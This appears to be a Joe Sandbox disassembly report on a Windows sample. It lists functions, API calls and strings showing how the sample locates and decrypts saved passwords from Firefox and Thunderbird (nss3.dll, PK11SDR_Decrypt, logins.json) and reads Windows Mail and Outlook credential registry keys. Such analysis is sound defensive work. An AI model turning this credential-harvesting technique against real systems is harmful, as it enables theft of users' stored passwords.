                  • Instruction ID: c9ff55592ed190661b3986ab950919d3506bad0d2814ede43270e5be3f0f5ae2
                  • Opcode Fuzzy Hash: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
                  • Instruction Fuzzy Hash: 4571D672404244BFD721DF61DC45EDB7FEDEB48344F00883EF648921A1DA399A65CBAA
                  Function 0040E54C Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 113libraryloaderstringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040E56D
                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                  • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                  • memset.MSVCRT ref: 0040E5C0
                  • strlen.MSVCRT ref: 0040E5CA
                  • strlen.MSVCRT ref: 0040E5D8
                  • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                  • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                  • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E6A2
                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                  • API String ID: 1296682400-4029219660
                  • Opcode ID: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
                  • Instruction ID: ea12e4d39b815288b34f85ef975f35705c11e21fdcabb8b0f4231a79c1823d94
                  • Opcode Fuzzy Hash: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
                  • Instruction Fuzzy Hash: 7E4197B1940318AACB20DF75CC49FC6BBE8AF64704F154C6BE185A2180E7B9A6D4CF58
                  Function 0040FAA6 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 168stringregistryCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040FACA
                  • memset.MSVCRT ref: 0040FAE2
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  • memset.MSVCRT ref: 0040FB1A
                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040F299
                  • _mbsnbicmp.MSVCRT ref: 0040FB48
                  • memset.MSVCRT ref: 0040FB67
                  • memset.MSVCRT ref: 0040FB7F
                  • _snprintf.MSVCRT ref: 0040FB9C
                  • _mbsrchr.MSVCRT ref: 0040FBC6
                  • _mbsicmp.MSVCRT ref: 0040FBFA
                  • strcpy.MSVCRT(?,?,?), ref: 0040FC13
                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040FC26
                  • RegCloseKey.ADVAPI32(0040FD0A), ref: 0040FC51
                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC5F
                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040FC71
                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC9E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                  • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                  • API String ID: 3269028891-3267283505
                  • Opcode ID: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
                  • Instruction ID: 1ceab4daf47746688ac62aede77486c23684b0aa94ce4f67dad83c1e3abd437f
                  • Opcode Fuzzy Hash: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
                  • Instruction Fuzzy Hash: 3851C67194515DBEDB31E7A18D42EDB7BACAF14304F0004FAB684F2141EA789FC98B69
                  Function 0040F797 Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040F7B8
                  • memset.MSVCRT ref: 0040F7CC
                  • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F7F9
                  • sprintf.MSVCRT ref: 0040F814
                  • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F821
                  • sprintf.MSVCRT ref: 0040F84B
                  • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F858
                  • strcat.MSVCRT(?,00414E74,?,?,?,?,?), ref: 0040F866
                  • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F878
                  • strcat.MSVCRT(?,004097A4,?,?,?,?,?), ref: 0040F883
                  • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F895
                  • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F8A7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcat$memsetsprintf$strcpy
                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                  • API String ID: 1662040868-1996832678
                  • Opcode ID: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
                  • Instruction ID: 1d89f71d6803e1250473f580c1fd87552222ed23aec69fbe6c7d3cec9cc88889
                  • Opcode Fuzzy Hash: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
                  • Instruction Fuzzy Hash: C731E673905714AEC720AA659D42DCBB76CAF14324F1082BFF214A2182D7BC9AD4CA9D
                  Function 0040B031 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040B056
                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040B067
                  • strrchr.MSVCRT ref: 0040B076
                  • strcat.MSVCRT(00000000,.cfg), ref: 0040B090
                  • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040B0C4
                  • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040B0D5
                  • GetWindowPlacement.USER32(?,?), ref: 0040B16B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$\LA
                  • API String ID: 1301239246-3877392175
                  • Opcode ID: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                  • Instruction ID: 0af9f59d4ba14ec1661be341c61033e05a04fd550f4be300a3a65ce9efdf479e
                  • Opcode Fuzzy Hash: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                  • Instruction Fuzzy Hash: F2414A72940118AFCB21DB54CC88FDABBBCAB58700F0441E6F509E7191DB749BC8CBA8
                  Function 004095F5 Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182stringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00409615
                  • memset.MSVCRT ref: 00409638
                  • memset.MSVCRT ref: 0040964E
                  • memset.MSVCRT ref: 0040965E
                  • sprintf.MSVCRT ref: 00409692
                  • strcpy.MSVCRT(00000000, nowrap), ref: 004096D9
                  • sprintf.MSVCRT ref: 00409760
                  • strcat.MSVCRT(?,&nbsp;), ref: 0040978F
                    • Part of subcall function 0040F6E2: sprintf.MSVCRT ref: 0040F701
                  • strcpy.MSVCRT(?,?), ref: 00409774
                  • sprintf.MSVCRT ref: 004097C3
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                  • API String ID: 2822972341-601624466
                  • Opcode ID: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
                  • Instruction ID: ad5d45e3310275bf8c81aed9ad428c342ee671dbf73ea1c77541a84cad310e98
                  • Opcode Fuzzy Hash: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
                  • Instruction Fuzzy Hash: AA615032900214AFDF18DF94CC85EDE7B79EF08314F1001AAFA05A71D2DB79AA95CB59
                  Function 0040D7C1 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 166stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00406C5E: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D7DA,?,?,?,?), ref: 00406C77
                    • Part of subcall function 00406C5E: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406CA3
                    • Part of subcall function 00404638: free.MSVCRT(00000000,0040BE16), ref: 0040463F
                    • Part of subcall function 00406209: strcpy.MSVCRT(?,?,0040D7FB,?,?,?,?,?), ref: 0040620E
                    • Part of subcall function 00406209: strrchr.MSVCRT ref: 00406216
                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C72C
                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C740
                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C754
                    • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C821
                    • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C881
                  • strlen.MSVCRT ref: 0040D81F
                  • strlen.MSVCRT ref: 0040D82D
                  • memset.MSVCRT ref: 0040D86E
                  • strlen.MSVCRT ref: 0040D87D
                  • strlen.MSVCRT ref: 0040D88B
                  • memset.MSVCRT ref: 0040D8CC
                  • strlen.MSVCRT ref: 0040D8DB
                  • strlen.MSVCRT ref: 0040D8E9
                  • _stricmp.MSVCRT(00000504,none,?,?,?,?,?,?), ref: 0040D997
                  • strcpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040D9B2
                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strlen$memset$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                  • String ID: logins.json$none$signons.sqlite$signons.txt
                  • API String ID: 1405107918-3138536805
                  • Opcode ID: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                  • Instruction ID: d07004e2ff50c5cd41ef2cdd6425adcf976a56e41a8fa9a3887142b7f0986be6
                  • Opcode Fuzzy Hash: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                  • Instruction Fuzzy Hash: B051E3B2904145AED714EBE0CC85BDAB7ACAF41305F10057BE159E21C2EB78AAD98B5C
                  Function 0040BA21 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • _stricmp.MSVCRT(/shtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA27
                  • _stricmp.MSVCRT(/sverhtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA3C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _stricmp
                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                  • API String ID: 2884411883-1959339147
                  • Opcode ID: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
                  • Instruction ID: 9cc75f2135a457fb5b155108ec4f1482e5c4f70433a9f240ecae405c43e57cbb
                  • Opcode Fuzzy Hash: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
                  • Instruction Fuzzy Hash: 0401DE7238A31128F934A1A63E17BD30A44CBE1B7AF30465BF555E41C1EF9D949094AC
                  Function 0040F8B4 Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 114stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: sprintf$memset$strcpy
                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                  • API String ID: 898937289-3842416460
                  • Opcode ID: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
                  • Instruction ID: e1dfaf3f0aab17dcf8878a0a22dd94d4c671af1ddc0a59b8f6102d88430d0a7a
                  • Opcode Fuzzy Hash: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
                  • Instruction Fuzzy Hash: F94133B2C4111D6EDB21DA54CD41FEB776CEF54348F0401BBB618E2142E2789F988F69
                  Function 0040DD59 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 118registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
                  • memset.MSVCRT ref: 0040DDA1
                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040DDCE
                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?,?,?), ref: 0040DDF7
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,?,00000000,000000FF,00000000,00000000), ref: 0040DE70
                  • LocalFree.KERNEL32(00000001), ref: 0040DE83
                  • RegCloseKey.ADVAPI32(?), ref: 0040DE8E
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
                  • RegCloseKey.ADVAPI32(?), ref: 0040DEB6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password$p@
                  • API String ID: 551151806-2386532916
                  • Opcode ID: 802061c58ab3b7a0c699a15447d727f2b4d3045fa72b958aab0169898b6b1aff
                  • Instruction ID: 9b96f835ed6997495325440ed53231f0f0ace883948e60a6f3a7b66043991938
                  • Opcode Fuzzy Hash: 802061c58ab3b7a0c699a15447d727f2b4d3045fa72b958aab0169898b6b1aff
                  • Instruction Fuzzy Hash: 61410676900219AFDB11DFA5DC84EEFBBBCEB48755F0040A6F905E2150DA34AB948B64
                  Function 0040E74B Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040E370), ref: 0040E75E
                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E777
                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E788
                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E799
                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E7AA
                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E7BB
                  • FreeLibrary.KERNEL32(00000000), ref: 0040E7DB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Library$FreeLoad
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                  • API String ID: 2449869053-232097475
                  • Opcode ID: 84e491b4529d3412f2215207142cb03e9d322bcacbabb572ff9b82cad9202ccb
                  • Instruction ID: 4da247ea616dd2a72ab7006308dc9c89d3535959c96c16615461c58e29f3e28a
                  • Opcode Fuzzy Hash: 84e491b4529d3412f2215207142cb03e9d322bcacbabb572ff9b82cad9202ccb
                  • Instruction Fuzzy Hash: B8012530645211AAC711DB266C81FA73DF99B85B80F15843FF400F2694DB7CC5529A6C
                  Function 004025C5 Relevance: 22.6, APIs: 3, Strings: 12, Instructions: 127stringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040266D
                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                  • strcpy.MSVCRT(?,?,?,?,?,76DBEB20,?,00000000), ref: 004026AB
                  • strcpy.MSVCRT(?,?), ref: 00402768
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcpy$QueryValuememset
                  • String ID: ,6A$47A$<6A$H6A$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Server$T6A$d6A$p6A$6A
                  • API String ID: 3373037483-299461207
                  • Opcode ID: e3f80b658476a1f582484f23fef2e1cdc73789c59224b923ecc992e764de9bf2
                  • Instruction ID: 73c24e987151304ffccade67a91af9495e30ddb8d36a1dc6faba254672d7bb93
                  • Opcode Fuzzy Hash: e3f80b658476a1f582484f23fef2e1cdc73789c59224b923ecc992e764de9bf2
                  • Instruction Fuzzy Hash: 534143B190021CBEDB31DF51CD49ADE7BA8AF04348F50457BF918A7291D3799A88CF98
                  Function 00410BCE Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136stringregistryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  • strlen.MSVCRT ref: 00410BF5
                  • ??2@YAPAXI@Z.MSVCRT ref: 00410C05
                  • memset.MSVCRT ref: 00410C51
                  • memset.MSVCRT ref: 00410C6E
                  • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00410C9C
                  • RegCloseKey.ADVAPI32(?), ref: 00410CE0
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410D31
                  • LocalFree.KERNEL32(?), ref: 00410D46
                  • ??3@YAXPAX@Z.MSVCRT ref: 00410D4F
                    • Part of subcall function 00406541: strtoul.MSVCRT ref: 00406549
                  Strings
                  • Software\Microsoft\Windows Live Mail, xrefs: 00410C90
                  • Software\Microsoft\Windows Mail, xrefs: 00410C84
                  • Salt, xrefs: 00410CCA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                  • API String ID: 1673043434-2687544566
                  • Opcode ID: 9f135b3b16ab4a195e4b1df328d548345a80f904511b1533856c3868a2259044
                  • Instruction ID: 35ff079a9a2d20c7a5c67e942e04d515760747927ccc6212efb4229f933df569
                  • Opcode Fuzzy Hash: 9f135b3b16ab4a195e4b1df328d548345a80f904511b1533856c3868a2259044
                  • Instruction Fuzzy Hash: 94419876D0021DAECB11DBA5DC41ADEBBBCAF48304F0441ABEA45F3241DA74DB85CB68
                  Function 0040CD82 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                  • API String ID: 4281260487-2229823034
